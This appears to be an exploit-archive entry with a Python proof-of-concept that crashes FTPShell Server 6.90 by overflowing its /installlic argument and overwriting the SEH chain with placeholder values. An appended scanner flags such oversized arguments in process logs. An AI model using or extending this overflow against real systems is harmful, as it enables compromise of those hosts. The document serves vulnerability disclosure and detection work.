FTPShell Server 6.90 Buffer Overflow

FTPShell Server version 6.90 buffer overflow proof of concept exploit.


MD5 | 9718fbd811cb07974f8ee049fd1df66d

# Exploit Title: FTPShell Server 6.90 (ftpshelldmgr.exe) - Buffer Overflow (SEH) (PoC)
# Exploit Author: Saeed reza Zamanian
# Date: 2020-07-01
# Vendor: Code Origin
# Vendor Homepage: https://www.ftpshell.com/
# Software Link: https://www.ftpshell.com/downloadserver.htm
# Version: 6.90 (Release Date: Jan 31, 2020)
# Tested On: Windows 7 Ultimate -- Build 7601 x64-based PC
# Tested On: Windows Vista SP2 -- build 6002 32-bit
#
# Replicate Crash:
# 1) Download and install the application
# 2) Execute the exploit (with administrative permissions)
# 3) Crash with SEH Overwrite
#
# You can also pass "/installlic {PAYLOAD}" in the arguments field of your debugger (Immunity Debugger or OllyDbg)

# SEH chain of main thread
# Address SE handler
# 0020FBFC 43434343
# 42424242 *** CORRUPT ENTRY ***


#!/usr/bin/python
import os

# Default install path; backslashes are doubled so Python does not read \P or \F as escape sequences
directory = 'C:\\Program Files\\FTPShellServer\\'           # default
#directory = 'C:\\Program Files (x86)\\FTPShellServer\\'    # directory_for_x64

offset = '\x41'*1112            # padding up to the SEH record
nSEH = '\x42\x42\x42\x42'       # next-SEH pointer (shows as 42424242 in the debugger)
SEH = '\x43\x43\x43\x43'        # SE handler (shows as 43434343 in the debugger)

payload = offset+nSEH+SEH

try:
    print("[+] Created %d byte payload, sending it." % len(payload))
    # the payload is passed as the /installlic argument of ftpshelldmgr.exe
    comm = ('cd '+directory+' && ftpshelldmgr.exe /installlic '+payload)
    stream = os.popen(comm)
    output = stream.read()
    print("[+] payload sent!")
except Exception as e:
    print("Failed: %s" % e)
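From the detection side, as an added example that is not part of the advisory or the PoC above: a small Python scanner that flags process-creation events in which ftpshelldmgr.exe is started with an oversized /installlic argument. The event field names follow Sysmon Event ID 1 ("Image", "CommandLine"), the sample events are constructed, and the 256-byte limit is an assumed threshold chosen well below the 1112 bytes the PoC needs to reach nSEH.

```python
import re

# Assumed threshold (not from the advisory): no real license key approaches
# this length, while the PoC needs 1112 bytes of padding just to reach nSEH.
MAX_LICENSE_ARG_LEN = 256

# The value after /installlic: either a double-quoted string or a bare token.
INSTALLLIC_RE = re.compile(r'/installlic\s+("[^"]*"|\S+)', re.IGNORECASE)


def extract_installlic_arg(command_line):
    """Return the argument passed to /installlic, or None if the switch is absent."""
    match = INSTALLLIC_RE.search(command_line)
    return match.group(1).strip('"') if match else None


def is_suspicious(image, command_line):
    """True when ftpshelldmgr.exe is started with an oversized /installlic value."""
    if not image.lower().endswith("ftpshelldmgr.exe"):
        return False
    arg = extract_installlic_arg(command_line)
    return arg is not None and len(arg) > MAX_LICENSE_ARG_LEN


def scan_events(events):
    """Filter process-creation events (dicts with Sysmon-style 'Image' and 'CommandLine' keys)."""
    return [e for e in events if is_suspicious(e.get("Image", ""), e.get("CommandLine", ""))]


# Constructed sample events modelled on Sysmon Event ID 1 fields (not real logs).
EXE = r"C:\Program Files\FTPShellServer\ftpshelldmgr.exe"
SAMPLE_EVENTS = [
    # normal license activation
    {"Image": EXE, "CommandLine": '"%s" /installlic ABCD-1234-EFGH' % EXE},
    # the PoC pattern: 1112 bytes of 'A', then the nSEH and SEH overwrite values
    {"Image": EXE, "CommandLine": '"%s" /installlic %s' % (EXE, "A" * 1112 + "BBBBCCCC")},
    # same binary, different switch, long argument: outside this rule's scope
    {"Image": EXE, "CommandLine": '"%s" /other %s' % (EXE, "A" * 2000)},
    # unrelated process with a long command line
    {"Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c echo " + "A" * 2000},
]

if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print("[!] oversized /installlic argument:", hit["CommandLine"][:70] + "...")
```

Only the second constructed event is reported; the long argument to a different switch and the long cmd.exe command line are left alone, so the rule stays tied to the specific crash path rather than to command-line length in general.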
